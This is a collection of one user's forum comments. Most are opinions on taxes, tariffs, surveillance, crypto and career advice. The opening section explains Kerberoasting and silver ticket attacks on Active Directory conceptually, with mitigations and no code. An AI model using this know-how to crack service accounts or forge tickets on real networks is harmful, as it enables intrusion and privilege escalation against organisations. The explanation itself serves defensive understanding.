harmon's comments

Fine, Kerberoasting abuses TGS-REPs which are colloquially referred to as TGS tickets or TGSs*. You know what I meant.

> It's wild to me that this could happen just from solving the puzzle that allows the user's account to use the user's privileges (only) on the service... ?

Yes, it is an unfortunate design decision in the Microsoft implementation of the Kerberos protocol.

To interact with Active Directory and perform privileged actions, a service needs an Active Directory account that it can leverage for authenticated actions. This is colloquially referred to as a "service account", but it is not a special account type, it is just a regular Active Directory user or computer account designated for exclusive use by a service. Sometimes administrators will save time by registering a service under their own Domain Admin user account instead of creating a designated account for a service. This effectively makes their user account the service account. In other cases, extensive privileges may be required by a service (e.g. for network access control services, asset discovery services, vulnerability scanners, etc) and administrators find it easier to just create a Domain Admin (high privilege) account for that service than to do fine grained permissioning. This creates a dangerous situation where if an attacker can kerberoast the account associated with the service, they can immediately take possession of a high privilege account that can be used anywhere within the Active Directory environment.

> Since it's cryptographic signing, wouldn't this require reversing the hash?

Yes, you would need to brute-force it.

> Does any valid inverse of the hash work, or only the actual password that happened to get hashed?

Theoretically yes, any valid inverse of the hash would work, but to my knowledge there aren't any hash collisions for the NT hash algorithm. Practically speaking, this means that only the user's password would yield the correct hash.

If you have the user's credentials then you can indeed connect to the service as you normally would. The advantages of performing this attack are:

1. You can obtain the service account's password, and the service account may be provisioned with more privileges than the user's account that you compromised. This allows for privilege escalation beyond simply accessing the service. For example, perhaps the service account has administrative access on other machines, or it is used for multiple services, or it is a Domain Admin in which case you can completely compromise the domain.

2. TGS tickets used to request access to a service are cryptographically signed with the password hash of the service account. Services use this to confirm ticket validity. In most cases, this means that if you can derive the service account password, you can forge TGS tickets that claim to be associated with arbitrary domain users. Instead of accessing the service as a low privilege user, you can now access the service as an Enterprise Admin or another high privilege account which could enable access to more resources or administrative access to the machine. This is called a Silver Ticket attack.

Managed and group managed service account passwords are typically 240 characters long and rotate every 30 days. It is highly unlikely that an attacker can crack these.

This article is somewhat incorrect. Kerberoasting abuses Ticket Granting Service tickets (TGSs, which are used to request access to a registered service in Active Directory), not Ticket Granting Tickets (TGTs, which are used to prove identity to a Domain Controller and request TGSs). However, the general attack described is still correct.

TGS are (AES or RC4) encrypted with the NT password hash of the service account they are associated with. If you have a weak service account password, then TGS can be cracked to obtain the service account's password. A lot of times admins will create service accounts that have way more permissions than required (e.g. they make them a DA) which can lead to an immediate privilege escalation. Sometimes they also use regular user accounts for service registration instead of designated service accounts, and user accounts tend to have weaker passwords. To make it worse, any low privilege Active Directory account can request a TGS for any service, even if they are not allowed to access that service.

Even if the service account is lower privilege, this can enable a silver ticket attack. https://www.crowdstrike.com/en-us/cybersecurity-101/cyberatt...

There are multiple mitigations for this:

1. Use managed or group managed service accounts instead of manually managed ones where possible. This ensures that account passwords are long, strong, and rotated regularly. If you are going to provision service accounts manually, give them very strong passwords.

2. Apply the principle of least privilege and only assign service accounts the privileges they need. Avoid placing them in high privilege groups.

3. Disable RC4 in your environment if possible via Group Policy.

4. Monitor for RC4 ticket requests. AES-encrypted tickets are the default these days. https://adsecurity.org/?p=3458

5. Create a honeypot service account: https://adsecurity.org/?p=3513

There is a somewhat similar attack against TGTs called ASREPRoasting: https://book.hacktricks.wiki/en/windows-hardening/active-dir...

As these tariffs are objectively likely to drive up costs, hurt user demand, and lower revenue for the company, I would argue that they have a duty to their shareholders and other stakeholders to push back against them and not be neutral. It is an action driven by business concerns rather than politics.

Also yes, taxes are listed as a separate line item.

As I understand it, you can only write off a business's expenses against that business's income, not income from other sources. For example, if you have a W2 income source and you have this business generating losses, you can't take your business losses or write offs and apply them to your W2 income, so you wouldn't really be saving any money as there would be no revenue to write off expenses against. You would need to get the business to generate revenue for this to be a viable idea.

The only case that I am aware of where you can take business losses / write offs and apply them to other income sources is in real estate, and only under very specific circumstances. This is one reason why high income individuals love things like short term rentals which is one circumstance in which this is possible.

I agree, honestly I feel a much better solution to this problem would be to extend the same tax advantages that you allude to when talking about a personal company to W2 employees.

Provision a home office? All of those expenses should be tax deductible.

BYOD? You should be able to expense a portion of the costs.

Pay for internet and power? You should be able to deduct a percentage of costs.

Have a work related meal? Tax deductible.

Drive your car to work? You should be able to deduct your mileage or depreciate your vehicle.

Pay for public transit passes to get to work? Tax deductible.

Etc, etc

Mass surveillance is out of control as you say, and I am a strong proponent of reigning in warrantless wiretaps and governmental overreach. However, as many people have stated, a pen register (which requires a warrant) against a specific individual suspected of a crime where there is a MASSIVE amount of evidence suggesting that the suspect is guilty has nothing to do with mass surveillance. This is targeted, narrowly scoped surveillance of a specific suspect and is precisely what law enforcement should be doing.

So I used to be in a very similar boat as you: I was depressed while working towards a STEM degree in college and ended up almost failing out with a 2.X GPA. I didn't see a path forward, and there was only one entity that was willing to hire me to do "real" work (for basically minimum wage). Like you, I thought I was totally fucked. Turns out, I wasn't. I spent the next 7 years working incredibly hard at that job. I taught myself software development skills in a similar manner as you out of personal interest. Eventually I was skilled enough to make major contributions at work and transitioned into a developer role. I continued studying and also took some remedial courses at a local university to prove that I could get A's if I tried. I then applied to a Master's program with glowing recommendations from my employer, a proven professional track record of success, and the transcripts from the local university. I was sure the admissions people would laugh and toss my application right into the trash. Guess what? I got into a great program! I'm now working in my dream role at a tech company, I got the opportunity to go back and prove to myself that I could succeed academically, and I learned a lot while in the program. You are already at a prestigious company as a full stack dev, so your road could be A LOT shorter than mine. I will give you the following advice based on my experience:

1. Realistically you are doing well. You are already in a great role; it sounds like you may just be struggling a bit. You mentioned feeling overwhelmed: have you reached out to your manager or a more senior engineer on your team for help? I bet they would be able to identify any weak points that you have which you could fix with self-directed learning (which it sounds like you are experienced at). Has anyone made a comment on your performance? If not, is it possible that some of your feelings are driven by imposter syndrome? The fact that you were hired despite your academic record suggests that you are certainly a competent dev.

2. No one likes hearing this, but you need to be patient. You only recently began your professional career (whereas I am in my mid 30s), and it will take time to build up the reputation and the track record to offset your past. By "time" I mean probably a few years minimum. Don't be deterred by this though, as these few years will be periods of heavy growth. I should also note that when I say it will take time to offset past performance, I am speaking purely from an academic perspective. From a professional perspective, you left your academic record behind when you got your first job, so I wouldn't spend time dwelling on it.

3. I agree that getting a Master's degree may be helpful, if for no other reason than it sounds like you may have a chip on your shoulder about your academic record. If you are serious about going back to school, take the following actions:

* Work. Fucking. Hard. Build a track record of success in your role.

* Get a portfolio of projects together that you can show off.

* Continue your self-directed learning and fill in gaps in understanding yourself. Work with your manager / seniors to identify these.

* Succeed in some sort of graded endeavor that you can use to display that you are serious and diligent: take courses somewhere and get A's; take coursework on Coursera or something else and get a certificate; get an industry certification or two; do research and put out a paper; etc. Basically you want to show the program that you can succeed academically and that you won't flake out if they admit you.

If you want to chat about your situation further, I'm happy to do so out of band.

Ultimately if users are satisfied and happy, does it even matter if it is fake? The end goal is not to create a real relationship, it is to create a happy fantasy for the buyer.

> The endless pursuit of growth is usually a byproduct of ego or at the behest of some intangible idea of "creating shareholder value."

If you don't want to grow that's fine, but then don't go public and don't seek VC funding. Investors make money when you grow; they generally don't make much when you don't. Ergo, they will always be pushing you to grow.

The existence of an "active" God as portrayed in most religions would complicate things tremendously though. If an entity can inject energy into the system or can alter system properties at will then the fundamental assumptions about the way the universe works go out the window.

Even if you only take courses that aren't wastes of time, there just isn't that much to do on a typical day. I remember when I was in school I was taking something like 5 AP courses senior year but still had multiple study halls per day, a useless homeroom which was basically a buffer for people getting to school late, a gym class, and a 40 minute lunch. Almost half the day was time not spent in lecture. A lot of the time is literally babysitting.

This is how people can go to college and spend comparatively little time in class yet learn more than they did in high school.

> Hot take: It’s fine when it happens to extreme hubris with paper wealth. It is not fine when it was someone unsophisticated chasing the herd who lost a meager sum that was meaningful to them. Comedy vs tragedy.

I think this is overlooking why people are engaging in these types of investments to begin with: they're greedy speculators who got caught up in a get rich quick scheme. They don't know what this tech is, why it is or isn't useful, or how it works. They don't know what the investment risks are and don't make any attempt at mitigating risk. They don't seek expert assistance. Instead of doing basic research to make informed decisions, they see dollar signs and yolo with their life savings. I don't feel bad for them in the same way that I don't feel bad for people who fall for 419 scams. If you participate in get rich quick schemes that you don't understand, there is a high probability of getting owned. This exact same collapse in value happened only 5 years ago, how could people be caught flat footed twice?

Exactly this. Every project is going to impact the environment. The end goal of a risk assessment is not to bring the environmental risk to zero, it is to bring it down to an acceptable level given the benefits of the project.

The story in the article was completely preventable if banks just tried harder.

The default 2FA solution should be Google authenticator or an analogous tech. If SMS MUST be used, it should be opt in.

Notification of anomalous transactions should be automatic, not something you have to configure.

Anomalous wire transfers should be flagged and require verbal authentication by phone.

Banks should stop sending so much spam marketing email so that when people receive an email from their bank it is something they actually read.

Etc

Honestly, I do think we should reopen psychiatric institutions (although properly funded and regulated this time) and forcibly treat certain people that need help. I don't think it is good or acceptable to allow people with obviously severe mental illness to self medicate with unregulated drugs or alcohol and walk around disrupting society. The current state of affairs works for no one, especially the mentally ill who we could be treating but have chosen not to.

As for property crime, no one wants to live in a society where someone can steal your stuff with impunity, as the broadly supported recent recall of the DA in SF has clearly shown.

I'm a crypto user, I'm a former Ethereum miner, I've read white papers, I've paid with things with crypto....and I'm disenchanted with it. Crypto seems to be great for three things: money laundering, tax evasion, and capital flight. Now, I'm not necessarily totally against those things as I think AML is excessive these days, I have a healthy distrust of government, and I value my privacy, but if you're not interested in doing those things then I struggle to see why crypto would be your go to solution for any problem. Can you name a problem which crypto has actually helped solve other than those? We've had billions of investment dollars and thousands of talented people enter this space and as far as I know basically nothing of real value has emerged as a result. I would love to be proven wrong though.

Agreed, if not a proxy then put your services behind a VPN or a bastion host when possible.